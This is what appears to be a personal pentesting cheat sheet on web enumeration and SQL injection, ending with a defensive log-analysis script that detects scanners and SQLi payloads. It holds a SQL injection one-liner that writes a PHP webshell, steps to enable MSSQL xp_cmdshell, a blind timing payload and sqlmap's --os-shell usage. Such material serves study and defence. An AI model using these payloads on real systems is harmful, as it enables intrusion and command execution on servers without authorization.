💻Web

Enum

Directories and pages

gobuster dir -u $ip -w /usr/share/wordlists/dirb/common.txt -t 5 where -u is the url or ip, -w is the wordlist, and -t is the number of threads

APIs

gobuster dir -u $ip -w /usr/share/wordlists/dirb/big.txt -p $pattern where -p is a file of gobuster patterns. There's no built-in pattern list, so you'll have to make one up as you go, informed by the API calls you see.

gobuster pattern example ({GOBUSTER} is replaced by each word in the wordlist):

```text
{GOBUSTER}/v1
{GOBUSTER}/v2
```

nikto -h URL is a simple vulnerability/enumeration scanner; it's a good place to start for relatively unprotected hosts.

Burp Suite

TODO

cURL

curl -i $url -d $data -H $header --proxy $proxy sends a request to the url with the response headers included (-i), a body (-d) and a header (-H), going through --proxy; note you can have more than one -H.

-X "$method" can be used to specify other HTTP methods (GET is the default, and curl switches to POST when -d is given).

Well Known URLs

/robots.txt
/security.txt
/sitemap.xml

Directory Traversal

SQLi

Connection and Recon

Connect to MySQL: mysql -u root -p'root' -h $ip -P $p where -u is the user, -p the password (no space between -p and the value), -h the host and -P the port.

Some useful commands

```sql
select version();
select system_user();
show databases;
-- the following is a one-liner to write a webshell out; the target path must be writable by the db user
' UNION SELECT "<?php system($_GET['cmd']);?>", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //
```

Connect to MSSQL from Kali with impacket: impacket-mssqlclient Administrator:passw0rd@$ip -windows-auth. Pretty straightforward; -windows-auth forces NTLM instead of Kerberos.

```sql
SELECT @@version;
SELECT name FROM sys.databases;
SELECT * FROM foobar.information_schema.tables; -- where foobar here is a database
select * from foobar.dbo.users; -- same here, foobar is a db
EXECUTE xp_cmdshell 'whoami'; -- disabled by default
-- turn on xp_cmdshell
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

Injection

Get the number of columns with ' ORDER BY 1-- //

Timing-based attack: the idea is that the query short-circuits if the preceding condition is true, but I distinctly remember someone saying once that SQL doesn't always short-circuit, so watch out for that: AND IF (1=1, sleep(3),'false') -- //

sqlmap

Use sqlmap -u "$url/blindsqli.php?user=1" -p user where -p is the vulnerable parameter. --dump can be added to dump the whole DB, and --os-shell gives us a shell.

Note that sqlmap is super loud.
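Because the gobuster runs above and sqlmap are so loud, they are easy to spot in the web server's access log. The following is an added example (not from these notes) of the detection side: a small Python script that reads constructed Apache combined-format log lines and flags clients producing a burst of 404s (wordlist enumeration), requests carrying URL-encoded markers from the payloads in these notes, and sqlmap's default User-Agent. The log lines, addresses and the sqlmap version string are all made up for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote_plus

# Constructed sample lines in Apache "combined" log format. Addresses, paths and the
# sqlmap version string are made up for this example; none of it is real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /admin HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:02 +0000] "GET /backup HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "GET /cgi-bin HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:03 +0000] "GET /v1 HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Mar/2024:12:00:04 +0000] "GET /v2 HTTP/1.1" 404 162 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Mar/2024:12:01:10 +0000] "GET /blindsqli.php?user=1%20AND%20IF(1%3D1%2Csleep(3)%2C'false')--%20// HTTP/1.1" 200 88 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.7 - - [10/Mar/2024:12:01:12 +0000] "GET /search.php?q=1'%20UNION%20SELECT%201%2Cnull%20INTO%20OUTFILE%20'/tmp/x.php'--%20// HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Markers taken from the payloads in these notes, matched after URL-decoding.
SQLI_RE = re.compile(r"union\s+select|into\s+outfile|sleep\s*\(|order\s+by\s+\d+|xp_cmdshell", re.I)


def analyze(log_text, burst=5, window=10):
    """Return {client_ip: set(reasons)} for clients that look like scanners."""
    findings, misses = defaultdict(set), defaultdict(list)
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        ip, path = m["ip"], unquote_plus(m["path"])
        if m["status"] == "404":
            misses[ip].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
        if SQLI_RE.search(path):
            findings[ip].add("sqli-payload")
        if "sqlmap" in m["ua"].lower():  # sqlmap's default User-Agent unless --random-agent is set
            findings[ip].add("sqlmap-user-agent")
    # Sliding window: `burst` 404s inside `window` seconds is a wordlist, not a mistyped URL.
    for ip, stamps in misses.items():
        stamps.sort()
        if any((stamps[i + burst - 1] - stamps[i]).total_seconds() <= window
               for i in range(len(stamps) - burst + 1)):
            findings[ip].add("404-burst")
    return dict(findings)


if __name__ == "__main__":
    for ip, reasons in sorted(analyze(SAMPLE_LOG).items()):
        print(ip, sorted(reasons))
```

Tune burst and window to the site's normal 404 rate; a single-page app that 404s on its own asset requests will need a higher threshold than a static site.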
